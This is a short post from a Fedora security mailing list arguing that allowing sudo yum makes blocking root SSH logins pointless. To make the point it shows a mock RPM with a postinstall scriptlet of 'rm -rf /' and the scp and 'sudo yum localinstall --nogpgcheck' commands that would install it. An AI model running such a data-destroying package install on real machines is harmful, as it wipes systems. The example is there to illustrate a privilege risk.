Security Changes For Fedora 9
Eric Rannaud
eric.rannaud at gmail.com
Mon Jan 14 19:16:10 UTC 2008
On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta at iki.fi> wrote:
> On Saturday 05 January 2008, Kevin Fenzi wrote:
> >
> > I find root ssh login handy for a number of reasons:
> [...]
> > - It's nice to be able to do for automated tasks (like say installing a
> > single new package on 20 machines without having to login and sudo on
> > each).
>
> "ssh -t $host sudo yum install $package" works for me...
What about (supposing I know the password of non-root user 'foo', and
assuming that 'foo' can sudo yum):
[hacker at tooeasy]$ rpm -q --scripts hacker_pkg.rpm
postinstall scriptlet (using /bin/sh):
rm -rf /
exit 0
[hacker at tooeasy]$ scp -p hackers_pkg.rpm foo at host:
[hacker at tooeasy]$ ssh -t foo at host sudo yum localinstall --nogpgcheck
./hackers_pkg.rpm
Am I wrong in assuming that yum is not necessarily a safe command to
be used with sudo? Or more exactly, that there is no point in blocking
root ssh logins if you're going to let a user that can login remotely
use sudo on yum?
Thanks.
More information about the Fedora-security-list
mailing list